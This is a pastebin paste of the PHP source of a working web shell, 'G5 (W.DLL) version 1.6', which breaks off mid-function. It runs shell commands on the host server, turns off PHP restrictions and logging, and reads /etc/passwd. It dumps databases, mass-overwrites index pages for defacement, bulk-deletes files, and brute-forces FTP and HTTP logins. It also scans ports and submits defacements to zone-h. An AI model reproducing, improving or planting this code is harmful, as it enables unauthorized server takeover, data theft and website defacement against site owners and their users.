· 9 years ago · Oct 05, 2016, 06:24 PM
1<?php
2/**
3 .-"""-.
4 / .===. \
5 \/ 6 6 \/
6 ( \___/ )
7 ______________ooo__\_____/__________________
8 / \
9| Hi All |
10| $3ll: G5 (W.DLL) version 1.6 |
11| author: Piaster (wadelamin) |
12| Offical: http://piaster.blogspot.com |
13| E-mail: w.dll@live.com |
14| copyright: 2010-2011 Piaster. |
15| Page: www.facebook.com/Pias.Piaster |
16 \___________________________ooo______________/
17 | | |
18 |_ | _|
19 | | |
20 |__|__|
21 /-'P'-\
22 (__/ \__)
23//--------------------------------------------/*/
24$access = 0; //if you don't wont anybody to access this file set $access=1
25$USR = "g5"; //User
26$PWD = "g5"; //PWD
27$color = 'black'; //#993333 #333333 style color
28$style = 'x4';// default x4 to change to orange style set var x5
29//---------------------------------------------------------------
30if($access==1){
31if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$USR || $_SERVER['PHP_AUTH_PW']!==$PWD){ob_end_clean();header('WWW-Authenticate: Basic realm="Piaster"');header('HTTP/1.0 401 Unauthorized');exit("<b><a href=http://www.w-dll.com>Piaster</a> : Access Denied</b>");}}
32
33session_start();
34@set_time_limit(0);
35@ini_restore("safe_mode");
36@ini_restore("allow_url_fopen");
37@ini_restore("open_basedir");
38@ini_restore("disable_functions");
39@ini_restore("safe_mode_exec_dir");
40@ini_restore("safe_mode_include_dir");
41
42
43@ini_set('error_log',NULL);
44@ini_set('log_errors',0);
45@ini_set('max_execution_time',0);
46@ini_set('output_buffering',0);
47$php = $_SERVER["PHP_SELF"];
48if(version_compare(phpversion(), '4.1.0') == -1)
49{$_POST = &$HTTP_POST_VARS;
50$_GET = &$HTTP_GET_VARS;}
51$tl=7;
52 global $loc,$pass,$port,$user,$db;
53
54if($_GET['kil']=="me"){
55@unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
56}
57$loc = 'localhost';
58
59define('db',htmlspecialchars($_POST['sqdbn']));
60define('pass',htmlspecialchars($_POST['sqpwd']));
61define('loc',htmlspecialchars($_POST['sqsrv'])? htmlspecialchars($_POST['sqsrv']):$log);
62define('port',htmlspecialchars($_POST['sqprt']));
63define('user',htmlspecialchars($_POST['sqlog']));
64define('style',$style);
65global $log;
66$log = @mysql_connect(loc,user,pass);
67$select = @mysql_select_db(db, $log);
68//$log = @mysqli_connect($loc,$user,$pass,$db,$port);
69
70if(isset($_REQUEST['dumd'])){
71$dt = date("Y-m-d");$db = $_POST['sqdbn'];$han = "WDLL-$db-$dt";$dmt = $_REQUEST['sqldp'];
72if ($dmt=='SQL'){$han="WDLL-$db-$dT.sql";$fp=fopen($han,"w");}else{$han="WDLL-$db-$dt.sql.gz";
73$fp = gzopen($han,"w");}
74
75$tb = @mysql_query ("SHOW TABLES");
76while ($X = @mysql_fetch_array($tb)) {
77$X = $X['Tables_in_'.$db];$mf = @mysql_fetch_array(@mysql_query ("SHOW CREATE TABLE ".$X));rt($mf['Create Table'].";\n\n");$sql = @mysql_query ("SELECT * FROM ".$X);
78if (@mysql_num_rows($sql)) {while ($row = @mysql_fetch_row($sql)) {foreach ($row as $v => $w) {
79$row[$v] = "'".@mysql_escape_string($w)."'";}rt("INSERT INTO $X VALUES(".implode(",", $row).");\n");}}}
80if ($dmt=='SQL'){fclose ($fp);}else{gzclose($fp);}
81header("Content-Disposition: attachment; filename=" . $han);
82header("Content-Type: application/download");
83header("Content-Length: " . @filesize($han));@flush();
84$fp = @fopen($han, "r");while (!feof($fp)){echo @fread($fp, 65536);@flush();} @fclose($fp); }
85
86if (isset($_REQUEST['dWNf'])||isset($_REQUEST["download"]) && $_REQUEST["download"] != @basename($_SERVER["SCRIPT_FILENAME"]))
87{if(isset($_REQUEST['dWNf'])){$file = htmlspecialchars($_POST['dWn']);}else {$file =$_REQUEST["download"];}
88header('Content-Length:'.@filesize($file).'');
89header('Content-Type: application/octet-stream');
90header('Content-Disposition: attachment; filename="'.$file.'"');
91if(function_exists('readfile')){@readfile($file);}else @file_get_contents($$file);}
92if (!empty($_POST['goto'])) { @chdir($_POST['goto']); $path = @realpath($_POST['goto']);}
93if(isset($_GET['dir'])&& !@is_file($_GET['dir'])){$path =@chdir(base64_decode(htmlspecialchars($_GET['dir'])));}
94if($dir){@chdir($_POST['dir']);}
95else {$path = @realpath(".");}
96$path = @realpath(".");
97
98if(!$win){
99define(path,$path);}else
100 {$mxpath = str_replace('\\','/',$path);
101define(path,$mxpath.'/');}
102function curc(){
103$crk = @get_loaded_extensions();
104if(@in_array("curl", $crk)){return true;}else {return false;}}
105
106if(isset($_REQUEST["sqconf"]) or isset($_REQUEST["msq1"])){head('black');}
107else {head($color);} // ^_^
108if (isset($_REQUEST["action"]) && $_REQUEST["action"] != @basename($_SERVER["SCRIPT_FILENAME"])){
109 $fa = stripcslashes(htmlspecialchars($_REQUEST["action"]));
110 $fa = urldecode(base64_decode(str_replace("\\\\","\\",$fa)));
111 ;echo "<center><br><br> <p align=\"center\"><a href=\"javascript: close()\">Close</a></p><table border =\"1\" bgcolor =\"black\"><tr><td><font color =\"red\"><b> File Path: </font> " .$fa. "</td><tr><tr><td><font color =\"red\"><b>File Size: </b></font>" . wdll_s1z(@filesize($fa)) ."</td></tr> <tr><td><font color =\"red\"><b>Create:</b></font> ".@date('d/m/Y H:i:s',@filectime($fa))."</td></tr><tr><td><font color =\"red\"><b>Modify: </b></font>" .@date('d/m/Y H:i:s', @filemtime($fa)) ."</td></tr><tr><td><font color =\"red\"><b>Mode: </b></font>" .wdll_permc($fa) . "</td></tr></table></center><br><center><table><tr>";echo "<form method=\"post\" action=\"" . $php . "?download=".$fa ."\"> ";sub('down','Download',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?cod=" .@base64_encode($fa)."\">";sub('Source','Source',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?chmod=" .$fa."\">";echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?delete=" .@base64_encode($fa)."\">";sub('Delete','Delete',$pr='');echo "</form>";echo "</tr></table></center>";ft(); die;}
112
113if (isset($_REQUEST["delete"]) && $_REQUEST["delete"] != @basename($_SERVER["SCRIPT_FILENAME"]))
114{$rdel = base64_decode($_REQUEST["delete"]);
115 $rdel = str_replace("\\", DIRECTORY_SEPARATOR, $rdel);if (@is_dir($rdel)){if (substr($rdel, -1) != DIRECTORY_SEPARATOR){$rdel .= DIRECTORY_SEPARATOR;}} elseif (is_file($rdel)){if(@unlink(htmlspecialchars($rdel))){echo "file " . $rdel . " Removed";}} else {echo "File Not Found";}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
116
117if (isset($_REQUEST["cod"]) && $_REQUEST["cod"] != @basename($_SERVER["SCRIPT_FILENAME"])){ if ($_REQUEST["cod"]){$tx = @base64_decode($_REQUEST["cod"]);if(function_exists('highlight_file')){@highlight_file($tx);}elseif(@function_exists('file_get_contents')){echo @file_get_contents($tx);}elseif(function_exists('file')){echo @file($tx);}else {rd();}}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>";ft(); die;}
118
119if (isset($_REQUEST["info"]) && $_REQUEST["info"] != @basename($_SERVER["SCRIPT_FILENAME"]))
120{ echo("(wadelamin)<br> www.w.dll-sd.com<br>www.piaster.net<br> w.dll@live.com 2011 ");echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";ft(); die;}
121 if(isset($_REQUEST['allss'])){
122switch ($_REQUEST['fsOP'])
123{
124//toolz
125case 'cmdr': {$oP = 6;}break;
126case 'mil' : {$oP = 7;}break;
127case 'fts' : {$oP = 8;}break;
128case 'ftm' : {$oP = 9;}break;
129case 'frc' : {$oP = 10;}break;
130case 'fcf' : {$oP = 11;}break;
131case 'fsf' : {$oP = 12;}break;
132case 'fbk' : {$oP = 13;}break;
133case 'cry' : {$oP = 14;}break;
134case 'seaa': {$oP = 15;}break;
135}define(oP,$oP);}
136 if(isset($_REQUEST['allqw'])){
137switch ($_REQUEST['dbOP']){
138case 'dmi': {$oPp = 1; }break;
139case 'ddu' : {$oPp = 2;}break;
140case 'ddr' : {$oPp = 3;}break;
141case 'dau' : {$oPp = 4;}break;
142case 'dml' : {$oPp = 5;}break;
143case 'dqu' : {$oPp = 6;}break;
144case 'etr' : {$oPp = 7;}break;
145
146 }define(oPp,$oPp);}
147
148 if(isset($_REQUEST['mSendm'])) {
149
150 $headers = 'To: '.$_REQUEST['mito']."\r\n";
151 $headers .= 'From: '.$_REQUEST['mnam'].' '.$_REQUEST['mmail']."\r\n";
152 if (mail($_REQUEST['mito'],$_REQUEST['msubj'],$_REQUEST['mmsg'],$headers)) {
153 echo "<center><b>Email sent!</b></center>";
154 }
155 else { echo "<center>Couldn't send email!</center>"; }
156echo "<br><br><br><a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>"; ft();exit; }
157if(isset($_REQUEST["massa"]))
158{global $coded,$lop,$msi;
159$lop = 2;
160$coded = htmlspecialchars($_POST['coded']);
161$skid= htmlspecialchars($_POST['skid']);
162$msd = htmlspecialchars($_POST['masdr']);
163@chdir($msd);
164$msi = $_POST['msi'];
165if($msi == 'msfi'||$msi == 'msfa'||$msi == 'msfr'){
166$msdr = @opendir($msd) or die("<br><b>Permision denied! Unable to open dir $msd");
167wdll_nora($msdr, $msd,$coded,$skid);
168}
169else{db_mass($coded,$msi);exit;}}
170
171function fetchFilef($url,$path,$file)
172{$data=fetchFile($url);
173 if ($data)
174 {$d=@fopen($path.'/'.$file,"wb");
175 $ret=@fwrite($d,$data);
176 @fclose($d);
177 return $ret;}return false;}
178
179function fetchFile($url){
180 $urlpr=@parse_url($url);
181 $in='';
182 $host=$urlpr['host'];
183 $port=isset($urlpr['port']) ? intval($urlpr['port']) : 80;
184 if ($port==0) $port=80;
185 $path=$urlpr['path'];
186 if (isset($urlpr['query'])&&$urlpr['query']!='') $path.='?'.$urlpr['query'];
187 $fs=@fsockopen($host,$port,$errno,$errstr,3);
188 if ($fs)
189 {$out="GET $path HTTP/1.1\r\nHost: $host\r\n";
190 $out.="Connection: close\r\n\r\n";
191 @fwrite($fs,$out);
192 $end=false;
193 while (!feof($fs))
194 {$fl=@fgets($fs,1024);
195 if ($end) $in.=$fl;
196 if ($fl=="\r\n") $end=true;}
197 @fclose($fs);
198 }return $in;}
199 function rt($dat) {global $fp;if ($_REQUEST['sqldp']=='SQL'){@fwrite($fp,$dat);}else{@gzwrite($fp, $dat);}}
200
201if(@function_exists('mysql_connect')){$dtb = "<font color=green>MySQL : On</font>";};if(@function_exists('mssql_connect')){$dtb = "<font color=green>MSSQL : On</font>";};if(@function_exists('pg_connect')){$dtb = "<font color=green>PostgreSQL : On</font>";};if(@function_exists('ocilogon')){$dtb = "<font color=green>Oracle : On</font>";};
202$win = strtolower(substr(PHP_OS,0,3)) == "win";
203$HO= "<a href=\"".$php."\">Home</a>";$kilm= "<a href=\"".$php."?kil=me\">Kill Me</a>";
204$sys = "OS: <font color=orange>".@wordwrap(@php_uname())."</font>";
205$us = "User: <font color=orange>".@get_current_user()."</font>";
206$SAD = "Admin Mail: <font color=orange>".$_SERVER['SERVER_ADMIN']."</font>";
207$soft = "Server: "."<font color=orange>".@getenv("SERVER_SOFTWARE")."</font>";
208if(@ini_get('disable_functions')){$FUC="Functions: <font color=red>Disable</font>";}else{$FUC="Functions:<font color=green> Enable</font>";}
209if(curc()){$cur="Curl: <font color=green>Enable</font>";}else{$cur="Curl: <font color=red>Disable</font>";}
210if (function_exists('ini_get'))
211if (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode")) == "on")
212{$safe= TRUE;$mode = "<font color=red>ON</font>";}
213else {$safe = FALSE; $mode = "<font color=green>OFF</font>";}
214if (function_exists('ini_get'))
215{$ob = @ini_get("open_basedir");}else {$ob = @get_cfg_var("open_basedir");}
216if ($ob or strtolower($ob) == "on") {$openB = TRUE; $basedir = "<font color=red>".$ob."</font>";}
217else {$openB = FALSE; $basedir = "<font color=green>OFF</font>";}
218echo "<br><table bgcolor=\"800000\" width =80%><td>";
219echo "|| $HO || Safe Mode = ".$mode." | Open_Basedir = ". $basedir." |".$us." |".$soft." | ".$SAD." | ".$FUC." | ".$cur."<BR>";
220
221echo $sys;
222if(!$win)echo " | <b>Uid=".@getmyuid()." Gid=".@getmygid()."</b> |";
223if (is_callable("disk_free_space"))
224{$fre = @disk_free_space($path);$tot = @disk_total_space($path);if ($fre === FALSE) {$fre = 0;}if ($tot === FALSE) {$tot = 0;}if ($fre < 0) {$fre = 0;}if ($tot < 0) {$tot = 0;}$used = $tot-$fre;$frep = @round(100/($tot/$fre),2);
225echo " | HDD Free <font color =\"orange\">".wdll_s1z($fre)."</font> HDD Total <font color =\"orange\">".wdll_s1z($tot)."</font> (".$frep."%)</b> ";}
226echo"<font color=ffffff> |Dir mode: <b>".substr(decoct(@fileperms($path)), -3, 3)."</b></font>| DB: ".$dtb." | ".$kilm."";
227echo "</td></table><br>";
228
229if(isset($_REQUEST["find"]))
230{wdll_repx(); global $fin;
231$pathfd =htmlspecialchars($_POST['goto']);
232$fin = stripcslashes(htmlspecialchars($_POST['fin']));$fin = str_replace("\\\\","\\",$fin);
233$dih = @opendir($pathfd) or die("<br><b>Permision denied! Unable to open dir $path");
234echo wdll_nora($dih,$pathfd,$fin);}
235
236if(isset($_REQUEST["search"]))
237{ global $words,$wordonly,$sesir,$serdir,$sea,$lop;
238$lop = 1;
239$serdir = htmlspecialchars($_POST['serdir']);
240$sesir = htmlspecialchars($_POST['sedir']);
241$words = trim(htmlspecialchars($_POST['searcc']));
242$wordonly = trim('/'.$words.'/');
243
244$sea = $_POST['sea'];
245$skid= htmlspecialchars($_POST['skid']);
246wdll_repx();
247$ser = @opendir($serdir) or die("<br><b>Permision denied! Unable to open dir $path");
248wdll_nora($ser, $serdir,$words,$skid);
249echo "<a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";exit;}
250
251if(oP == '10' || isset($_GET['dir'])|| isset($_GET['show'])||isset($_REQUEST["dir"]))
252{echo "<form action=\"".$php."\"method=\"post\">
253<a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";
254if($win)wdir();echo "<br><br>
255<b>Change Directory<br></b>";
256inp('text','25','goto',path);
257sub('dir','GO');
258echo "</form>";
259 $files = array();
260 $dir = array();
261wdll_repxl();
262 if ($handle = @opendir(path))
263 {while (false !== ($file = @readdir($handle)))
264 {if(@is_dir($file)){$dir[] = $file;}else{$files[] = $file;}}
265 asort($dir);asort($files);
266 foreach($dir as $file){wdll_repxt($file);}
267 foreach($files as $file){wdll_repxtr($file);}}
268 else{echo "<u>Error!</u> Can't open <b>".@realpath('.')."</b>!<br>";}if(!isset($_GET['show']))exit();
269}
270function CFile($file,$serc)
271 {
272 if (!@is_readable($file))
273 {@chmod($file, 0644);}
274 $ioo = @file_get_contents($file);
275 $x0 = true;
276 if(@preg_match($serc, $ioo))
277 {$x0 = false;}return $x0;}
278
279function md($mvdir,$dst,$cop=false) {
280if (substr($dst,-1) == "\\") $dst = substr($dst,0,strlen($dst)-1);
281if (substr($mvdir,-1) == "\\") $mvdir = substr($mvdir,0,strlen($mvdir)-1);
282if (!file_exists($mvdir)) return FALSE;
283dexists($dst);
284$han = @opendir($mvdir);
285while ($f = @readdir($han)) {
286$mvd = $mvdir . "\\" . $f;
287if (@is_dir($mvd)) {
288if (!($f['value']=="." || $f=="..")) {
289md($mvd,$dst . "\\" . $f,$cop);};} else {
290if(@copy( $mvd ,$dst . "\\" . $f))echo $mvd." Move Done \n";
291if (!$cop) {
292@unlink($mvd);};};};@closedir($han);if (!$cop) {@rmdir($mvdir);};return TRUE;};
293function dexists($dir) {
294if (substr($dir,-1) == "\\") $dir = substr($dir,0,strlen($dir)-1);
295if (@file_exists($dir)) return TRUE;
296$ex = explode("\\",$dir);
297while ($mc = each($ex)) {
298$mx = $mc['value'];};
299$mx = str_replace("\\" . $mx,"",$dir);
300if (!file_exists($mx)) {
301dexists($mx);};
302@mkdir($dir,0777);
303return TRUE;}
304
305$sqquery = htmlspecialchars($_POST['sqquery']);
306define(sql_query,$sqquery);
307
308if($_REQUEST['do']=="db" || isset($_REQUEST['sqlwxp'])){
309echo sqlexp();
310exit;}
311
312if(isset($_REQUEST["sqconf"])){wdll_dbc();exit;}
313wdll_bdx('800000');
314
315function wdll_nora($dih, $path,$fin='',$skid ='')
316{ global $words,$wordonly,$sesir,$serdir,$sea,$msi,$lop,$fin;
317 while (false !== ($file = @readdir($dih)))
318{$dir = $path . '/' . $file;
319if (@is_dir($dir) && $file != '.' && $file != '..' && $file != $skid)
320{
321$wok = @opendir($dir) or die("<br><b>Permision denied! undable to open dir $file");
322wdll_nora($wok, $dir,$fin,$skid);}
323elseif ($file != '.' && $file != '..' && $file != $skid)
324{
325if($_REQUEST["find"]){if($file == $fin){wdll_rep($dir, $path, $file);}}
326if($lop=='1'){
327 switch ($_REQUEST["sea"])
328 {
329 case('cepr'):{if(!CFile($dir,$words)){wdll_rep($dir, $path, $file);}}break;
330 case('cewo'):{if(!CFile($dir,$wordonly)){wdll_rep($dir, $path, $file);}}break;
331
332 case('cefi'):{if (similar_text($file, $words) >= 3){wdll_rep($dir, $path, $file);}}break;
333 case('cefn'):{if($file == $words){wdll_rep($dir, $path, $file);}}break;
334
335 case('cefm'):{$perm = substr(decoct(@fileperms($dir)), -3, 3);if($perm == $words){wdll_rep($dir, $path, $file);} }break;
336 case('ceft'):{$xtr = @pathinfo($file);$extt = $xtr["extension"]; if($extt == $words){wdll_rep($dir, $path, $file);}}break;
337
338 default:{ echo "<a href=\"javascript: history.go(-1)\">Back.... </a>";die('PLZ Select Search Mode');}}}
339
340 if($lop =='2')
341 {switch ($_REQUEST["msi"]){ case('msfi'):{if($file == 'index.php'or $file == 'home.php'or $file == 'index.aspx'or $file == 'index.html'or $file == 'index.htm'){ fiindex($dir);}}break;
342 case('msfa'):{if(@is_file($dir)) {fiindex($dir);}}break;
343case('msfr'):{if($file != 'index.php'or $file != 'home.php'or $file != 'home.aspx'or $file != 'index.html'or $file != 'index.htm'){delf($dir);}}break;}}
344
345}}@closedir($dih);}
346//-------------------------------------------------------------------------------
347
348function extr_si(){
349 $rvlink = $_REQUEST["sqtid"];
350 {
351 $rvsorc = "http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=";
352 $rvall = $rvsorc.$rvlink;
353 $rvcon = file_get_contents($rvall);
354 preg_match_all('/"(.*?)"/si', $rvcon, $rvsits);
355 foreach(array_unique($rvsits[1]) as $rvrs) {
356 if(strstr($rvrs,'.')) {
357 if(eregi('www',$rvrs)) {
358 echo "http://".$rvrs."\n";
359 }
360 else {
361 echo "http://www.".$rvrs."\n";}}}}
362 }
363function cc($sit,$prt,$usr,$pwd,$tl){
364$ses = @curl_init();
365@curl_setopt($ses, CURLOPT_URL, "http://$sit:$prt");
366@curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
367@curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
368@curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
369@curl_setopt($ses, CURLOPT_CONNECTTIMEOUT, $tl);
370@curl_setopt($ses, CURLOPT_FAILONERROR, 1);
371$mix = @curl_exec($ses); return $mix;
372if ( @curl_errno($ses) == 28 ) {$er= "Connection Timeout Please Check [".$sit."]\n"; return $er; exit;}
373elseif ( @curl_errno($ses) == 0 )
374{$fc ="Cracking Success With Username [".$usr."] and Password [".$pwd."] Enjoy\n"; return $fc;}
375@curl_close($ses);}
376
377function fc($sit,$usr,$pwd,$tl){
378$ses = @curl_init();
379@curl_setopt($ses, CURLOPT_URL, "ftp://$sit");
380@curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
381@curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
382@curl_setopt($ses, CURLOPT_FTPLISTONLY, 1);
383@curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
384@curl_setopt ($ses, CURLOPT_CONNECTTIMEOUT, $tl);
385@curl_setopt($ses, CURLOPT_FAILONERROR, 1);
386$mix = @curl_exec($ses);
387if ( @curl_errno($ses) == 28 ) {$er ="[+]Error :Connection Timeout Please Check [".$sit."]\n"; return $er; exit;}
388elseif ( @curl_errno($ses) == 0 ){
389$fc = "[+]Cracking Success With Username [".$usr."] and Password [".$pwd."] Enjoy\n";}
390return $fc;
391@curl_close($ses);}
392
393function zhsr($hname,$htype,$hwhy,$domain)
394{$zh = 'http://zone-h.org/notify/single/';
395echo $zh."defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy."\n";
396$ch = @curl_init();
397@curl_setopt($ch, CURLOPT_URL, $zh);
398@curl_setopt($ch,CURLOPT_POST,true);
399@curl_setopt($ch, CURLOPT_POSTFIELDS,"defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy);
400@curl_setopt($ch,CURLOPT_FOLLOWLOCATION, true);
401@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
402if ( @curl_errno($ch) == 28 ) {$er= "Connection Timeout Please Check [http://zone-h.org]\n"; echo $er."\n"; exit;}
403elseif ( @curl_errno($ch) == 0 ) {echo "[+]Zone-H Done\n";}
404$rs = @curl_exec($ch);@curl_close($ch);echo $rs;}
405
406function wdll_updir($dih, $path)
407{while (false !== ($file = @readdir($dih))){$dir = $path . '/' . $file;
408if ($file != '.' && $file != '..'){if(!@is_file($file)){echo $dir." =======>[DIR]\n";}else echo $dir."\n";}}@closedir($dih);}
409
410function wdll_p($mode)
411{switch(true){case(($mode & 0xC000) === 0xC000): {$t = "s";}break;case(($mode & 0x4000) === 0x4000): {$t = "d";}break;case(($mode & 0xA000) === 0xA000): {$t = "l";}break;case(($mode & 0x8000) === 0x8000): {$t = "-";}break;case(($mode & 0x6000) === 0x6000): {$t = "b";}break;case(($mode & 0x2000) === 0x2000): {$t = "c";}break;case(($mode & 0x1000) === 0x1000): {$t = "p";}break;case true :{$t = "?"; }break;}$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0;$o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;return array("t" => $t, "o" => $o, "g" => $g, "w" => $w);}
412
413function show_users()
414{$users = array();$rows=@file('/etc/passwd');if(!$rows) return 0;foreach ($rows as $string){$user = @explode(":",$string);if(substr($string,0,1)!='#') array_push($users,$user[0]);}echo $users."\n";}
415function wdll_permc($file)
416{ if(@is_writable($file)) { return "writable";}
417if(!@is_writable($file) && @is_readable($file)) { return "red only";}
418if(!@is_writable($file) && @!is_readable($file)) { return "un writable";}
419}
420function wdll_perm($file)
421{
422$mode=@fileperms($file);
423$perms='';
424$perms .= ($mode & 00400) ? 'r' : '-';
425$perms .= ($mode & 00200) ? 'w' : '-';
426$perms .= ($mode & 00100) ? 'x' : '-';
427$perms .= ($mode & 00040) ? 'r' : '-';
428$perms .= ($mode & 00020) ? 'w' : '-';
429$perms .= ($mode & 00010) ? 'x' : '-';
430$perms .= ($mode & 00004) ? 'r' : '-';
431$perms .= ($mode & 00002) ? 'w' : '-';
432$perms .= ($mode & 00001) ? 'x' : '-';
433return $perms;
434}
435
436if(isset($_REQUEST["svff"]))
437{$wdf = stripslashes(stripcslashes($_POST['svdi']));
438$wdn = stripslashes(stripcslashes($_POST['cfed']));
439$wdc = @fopen($wdf, "wb");
440@fwrite($wdc, $wdn);
441@fclose($wdc);}
442
443function delf($dir)
444{$dir = str_replace("\\", DIRECTORY_SEPARATOR, $dir);
445if (@is_dir($dir)){if (substr($dir, -1) != DIRECTORY_SEPARATOR){$dir .= DIRECTORY_SEPARATOR;}}
446elseif (@is_file($dir)){if (@unlink($dir)){echo "File: ".$dir." ................Removed<br>";}}
447else{echo "Could not remove " . $dir . " OR File not Found";}}
448
449function wdll_cmdf($cmdq)
450{$res = '';if (!empty($cmdq)){if(function_exists('exec')){@exec($cmdq,$res);$res = @join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cmdq);}elseif(function_exists('system')){@ob_start();@system($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cmdq,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}
451
452function fiindex($wdf)
453{global $coded;
454 $wdc = @fopen($wdf, "wb");
455$wdn = str_replace("\\"," ",$coded);
456@fwrite($wdc, $wdn);
457if(@fclose($wdc))echo $wdf.".........Done<br>";
458return true; }
459function wdll_chf()
460{@ini_restore("safe_mode");
461@ini_restore("open_basedir");if(function_exists('exec')) return true;
462elseif(function_exists('system')) return true;
463elseif(function_exists('shell_exec')) return true;
464elseif(function_exists('passthru')) return true;
465else return false;}
466
467function wdll_s1z($size, $digits = 2)
468{ $kb = 1024; $mb = 1024 * $kb; $gb= 1024 * $mb; $tb = 1024 * $gb;
469switch (true){
470case ($size == 0): { return "N/A"; }break;
471case ($size < $kb): { return $size."B"; }break;
472case ($size < $mb): { return @round($size / $kb,$digits)."KB"; }break;
473case ($size < $gb): { return @round($size / $mb,$digits)."MB"; }break;
474case ($size < $tb): { return @round($size / $gb,$digits)."GB"; }break;
475case true: { return @round($size / $tb, $digits)."TB"; }break;
476}}
477function ps() {
478
479$hot = htmlspecialchars($_POST['hot']);
480$spt =intval(htmlspecialchars($_POST['spot']));
481$ept = intval(htmlspecialchars($_POST['epot']));
482echo "IP/Domain : ".$hot;
483echo "\nChecking...From ".$spt." To ".$ept." Ports\n";
484for($x = $spt; $x <= $ept; $x++) {
485$OK = @fsockopen($hot, $x, $errno, $errstr, 3);
486if($OK) {
487echo "[-] Port [".$x."] is open\n";}}echo "Port Scan Complete";}
488
489function rf(){$temp=@tempnam('', "wd");$pos= stripslashes($_POST['cfil']);if(@copy("compress.zlib://".$pos, $temp)){$han = @fopen($temp, "r");$fct = @fread($han, @filesize($temp));@fclose($han);return $fct;@unlink($temp);} else {echo("File".$pos."dosen't exists or you don't haveaccess.");}}
490
491if (!$error)
492{if (function_exists('ini_get')){$umf=@ini_get("upload_max_filesize");}else {$umf =@get_cfg_var('upload_max_filesize');}
493if (preg_match("/([0-9]+)K/i",$umf,$tem)) $umf=$tem[1]*1024;
494if (preg_match("/([0-9]+)M/i",$umf,$tem)) $umf=$tem[1]*1024*1024;
495if (preg_match("/([0-9]+)G/i",$umf,$tem)) $umf=$tem[1]*1024*1024*1024;}
496
497
498$up_d = $path ;
499
500if (!$error && isset($_REQUEST["upcom"]))
501{ if (@is_uploaded_file($_FILES["dfill"]["tmp_name"]) && ($_FILES["dfill"]["error"])==0)
502{
503$up_fn=str_replace(" ","_",$_FILES["dfill"]["name"]);
504$up_fn=preg_replace("/[^_A-Za-z0-9-\.]/i",'',$up_fn);
505$up_fp=str_replace("\\","/",$up_d."/".$up_fn);
506if (file_exists($up_fn))
507{ echo ("<p class=\"error\">File $up_fn already exist! Delete and upload again!</p>\n");}
508else if (!@move_uploaded_file($_FILES["dfill"]["tmp_name"],$up_fp))
509{ echo ("<p class=\"error\">Error moving uploaded file ".$_FILES["dfill"]["tmp_name"]." to the $up_fp</p>\n");
510echo ("<p>Check the directory permissions for $up_d (must be 777)!</p>\n");icod();}else
511{ echo ("<p class=\"success\">Uploaded file saved as $up_fn</p>\n");}}else
512{ echo ("<p class=\"error\">Error uploading file ".$_FILES["dfill"]["name"]."</p>\n");}}
513
514
515echo "<div align = center>";
516if (isset($_REQUEST["mkD"]))
517{
518if (file_exists(htmlspecialchars($_POST['mKd'])))
519{echo "Make Dir: \"".htmlspecialchars($_POST['mKd'])."\" Dir alredy exists";}
520elseif (!@mkdir(htmlspecialchars($_POST['mKd']),0777))
521{echo "Make Dir \"".htmlspecialchars($_POST['mKd'])."\" access denied";}
522else {echo "Dir :".htmlspecialchars($_POST['mKd'])."Created Done"; }
523}
524if (isset($_REQUEST["mkF"]))
525{
526if (file_exists($mkfile))
527{echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" File alredy exists";}
528elseif (!@fopen(htmlspecialchars($_POST['mKf']), "wb"))
529{echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" access denied";}
530else {echo "<b>File:".htmlspecialchars($_POST['mKf'])."Created Done";}
531}
532if(isset($_REQUEST["chfl"])){
533$ftc = htmlspecialchars($_POST['cfx']);
534$ftx = $_POST['cfy'];
535echo $ftc.$ftx;
536switch($_POST['ch'])
537{
538case 'cm':
539if(@chmod($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
540access";break;case 'co':
541if(@chown($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
542access";break;case 'cg':
543if(@chgrp($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
544access";break;case 'cu':if(@unlink($ftc)){echo "File: ".$ftc." Removed";}else echo " dosen't exists or you don't haveaccess";break;}}
545
546if(isset($_REQUEST["upff"]))
547{
548$ft1 = htmlspecialchars($_POST['upf']);
549$cod = htmlspecialchars($_POST['code']);
550fmas($ft1,$cod);
551}
552function fmas($dir,$codm)
553{
554$han = @fopen($dir,"w+");
555@fwrite($han, $codm);
